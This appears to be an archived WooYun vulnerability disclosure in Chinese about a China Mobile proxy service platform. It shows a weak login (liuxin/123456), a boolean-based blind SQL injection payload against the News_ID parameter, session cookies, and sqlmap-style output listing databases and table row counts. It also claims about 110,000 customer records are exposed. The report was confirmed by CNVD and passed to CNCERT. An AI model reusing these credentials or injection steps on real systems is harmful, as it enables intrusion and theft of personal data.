乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-29: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
RT
系统:中国移动代理服务器统一服务平台
http://**.**.**.**/
弱口令:liuxin 密码:123456登陆后发现如下链接存在注入:
http://**.**.**.**/newsview.asp?News_ID=9
漏洞地址:
GET /newsview.asp?News_ID=9 HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: ASPSESSIONIDCQRRAQCC=GCGNBCGAGGPBPKAEFKGHPBHI; User%5FType=%D3%C3%BB%A7; User%5FID=1692; User%5FAccount=liuxin; NewsFlag=29
ID参数存在注入
---Parameter: News_ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: News_ID=9 AND 3394=3394---[17:12:26] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008
数据库:
available databases [5]:[*] master[*] model[*] msdb[*] tempdb[*] zps
二千多万数据信息泄漏
Database: zps+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| dbo.MT20150512 | 1300631 || dbo.MT20150724 | 1216847 || dbo.MT20150521 | 1112351 || dbo.MT20150529 | 1104653 || dbo.MT20150520 | 1087323 || dbo.MT20150619 | 1078151 || dbo.MT20150814 | 1077438 || dbo.MT20150730 | 1065513 || dbo.MT20150930 | 1014321 || dbo.MT20150618 | 1002796 || dbo.MT20150605 | 943391 || dbo.MT20150925 | 941665 || dbo.MT20150820 | 917963 || dbo.MT20150522 | 875826 || dbo.Stat | 860200 || dbo.MT20150604 | 845547 || dbo.MT20150716 | 821092 || dbo.MT20150626 | 797548 || dbo.MT20150513 | 785944 || dbo.MT20150911 | 774978 || dbo.MT20150612 | 768985 || dbo.MT20150806 | 759100 || dbo.MT20150525 | 757955 || dbo.MT20150515 | 748140 || dbo.MT20150703 | 717539 || dbo.MT20150710 | 711096 || dbo.MT20150819 | 703292 || dbo.MT20150821 | 699784 || dbo.MT20150717 | 666628 || dbo.MT20150528 | 649976 || dbo.MT20150501 | 630256 || dbo.MT20150507 | 606188 || dbo.MT20150910 | 601285 || dbo.MT20150530 | 598854 || dbo.MT20150508 | 587658 || dbo.MT20150723 | 583387 || dbo.MT20150601 | 572061 || dbo.MT20150625 | 570554 || dbo.MT20150514 | 555043 || dbo.MT20150929 | 542677 || dbo.MT20150705 | 526571 || dbo.MT20150731 | 519889 || dbo.MT20150623 | 510131 || dbo.MT20150807 | 498585 || dbo.MT20150725 | 494786 || dbo.MT20150519 | 490501 || dbo.MT20150709 | 476383 || dbo.MT20150516 | 471334 || dbo.MT20150523 | 467576 || dbo.MT20150620 | 466131 || dbo.MT20150606 | 456222 || dbo.MT20150611 | 451591 || dbo.MT20150616 | 448405 || dbo.MT20150918 | 446117 || dbo.MT20151029 | 446050 || dbo.MT20150617 | 445359 || dbo.MT20150603 | 441944 || dbo.MT20150926 | 438594 || dbo.MT20150702 | 419481 || dbo.MT20150526 | 414403 || dbo.MT20150722 | 414216 || dbo.MT20150527 | 409097 || dbo.MT20151023 | 403022 || dbo.MT20150917 | 391099 || dbo.MT20150907 | 383748 || dbo.MT20150701 | 372585 || dbo.MT20150828 | 370820 || dbo.MT20150924 | 369880 || dbo.MT20150610 | 367191 || dbo.MT20150615 | 364051 || dbo.MT20150509 | 363048 || dbo.MT20150704 | 362277 || dbo.MT20150609 | 360586 || dbo.MT20150906 | 358841 || dbo.MT20150624 | 355980 || dbo.MT20151016 | 353044 || dbo.MT20150801 | 347919 || dbo.MT20150812 | 343406 || dbo.MT20151001 | 336112 || dbo.MT20150822 | 326996 || dbo.MT20150818 | 323604 || dbo.MT20150602 | 318139 || dbo.MT20150916 | 313292 || dbo.MT20150630 | 311439 || dbo.MT20150908 | 310660 || dbo.MT20150608 | 309429 || dbo.MT20150714 | 307381 || dbo.MT20150627 | 306443 || dbo.MT20150914 | 305100 || dbo.MT20150919 | 304626 || dbo.MT20150629 | 303031 || dbo.MT20150817 | 301790 || dbo.MT20150728 | 301428 || dbo.MT20150811 | 299258 || dbo.MT20150923 | 298486 || dbo.MT20150711 | 296465 || dbo.Finance | 294621 || dbo.MT20150524 | 292272 || dbo.MT20150909 | 291320 || dbo.MT20150506 | 290831 || dbo.MT20150511 | 286425 || dbo.MT20150707 | 285185 || dbo.MT20150721 | 284167 || dbo.MT20150813 | 281533 || dbo.MT20150824 | 273909 || dbo.MT20150518 | 271676 || dbo.MT20150815 | 267474 || dbo.MT20150708 | 265154 || dbo.MT20150808 | 259589 || dbo.MT20150531 | 256310 || dbo.MT20150720 | 251164 || dbo.MT20151022 | 251160 || dbo.MT20150504 | 248356 || dbo.MT20150706 | 246225 || dbo.MT20150502 | 245435 || dbo.MT20150827 | 238763 || dbo.MT20151008 | 234516 || dbo.MT20150805 | 231733 || dbo.MT20150613 | 231690 || dbo.MT20151014 | 231209 || dbo.MT20151020 | 229877 || dbo.MT20150928 | 227405 || dbo.MT20150921 | 222047 || dbo.MT20150729 | 221324 || dbo.MT20150727 | 220879 || dbo.MT20150803 | 217732 || dbo.MT20151015 | 215287 || dbo.MT20150718 | 211080 || dbo.MT20150829 | 210303 || dbo.MT20150712 | 210123 || dbo.MT20150922 | 209444 || dbo.MT20150719 | 206663 || dbo.MT20150505 | 206100 || dbo.MT20150804 | 204653 || dbo.MT20150510 | 204634 || dbo.MT20151009 | 202417 || dbo.MT20150715 | 197408 || dbo.MT20150621 | 195673 || dbo.MT20150816 | 193286 || dbo.MT20150927 | 190966 || dbo.MT20150713 | 189635 || dbo.MT20150517 | 189051 || dbo.MT20150826 | 185623 || dbo.MT20150726 | 184240 || dbo.MT20151027 | 183812 || dbo.MT20150810 | 181070 || dbo.MT20151017 | 170336 || dbo.MT20151012 | 165449 || dbo.MT20150825 | 165161 || dbo.MT20151021 | 163153 || dbo.MT20151024 | 163039 || dbo.MT20151019 | 162500 || dbo.MT20150622 | 160195 || dbo.MT20151026 | 157108 || dbo.MT20150607 | 155359 || dbo.MT20150915 | 153941 || dbo.MT20150912 | 153011 || dbo.MT20150830 | 152814 || dbo.MT20150503 | 149904 || dbo.MT20150823 | 149206 || dbo.MT20150920 | 143914 || dbo.MT20150614 | 135904 || dbo.Send | 133039 || dbo.MT20150802 | 126744 || dbo.MT20151010 | 122862 || dbo.MT20151013 | 120010 || dbo.MT20151028 | 119794 || dbo.Customer | 115709 || dbo.MT20151018 | 112197 || dbo.MT20151003 | 111246 || dbo.MT20150809 | 103169 || dbo.MT20150831 | 93620 || dbo.MT20150628 | 87142 || dbo.MT20150913 | 86647 || dbo.MT20151006 | 85695 || dbo.MT20151002 | 85216 || dbo.MT20151025 | 83901 || dbo.Log | 72479 || dbo.MT20151004 | 62265 || dbo.MT20151005 | 59134 || dbo.MT20151011 | 55722 || dbo.MT20151007 | 53971 || dbo.Recv | 42201 || dbo.MT20150904 | 42055 || dbo.MT20150902 | 17847 || dbo.MT20150905 | 15111 || dbo.MT20150903 | 9977 || dbo.UserChannel | 7011 || dbo.MT20150901 | 4785 || dbo.BlackList1 | 2992 || dbo.Admin | 543 || dbo.Draft | 282 || dbo.DraftType | 178 || dbo.Badwords | 27 || dbo.ChannelSend | 18 || dbo.CycleSend | 16 || dbo.Channel | 1 || dbo.News | 1 || dbo.Setting | 1 |+-----------------------------+---------+Database: msdb+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| dbo.syspolicy_configuration | 4 |+-----------------------------+---------+
11W用户详细信息:姓名、性别、地址、手机、传真、QQ、邮件
未脱库,怕被查水表,点到为止
@@
危害等级:高
漏洞Rank:10
确认时间:2015-11-02 15:27
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
暂无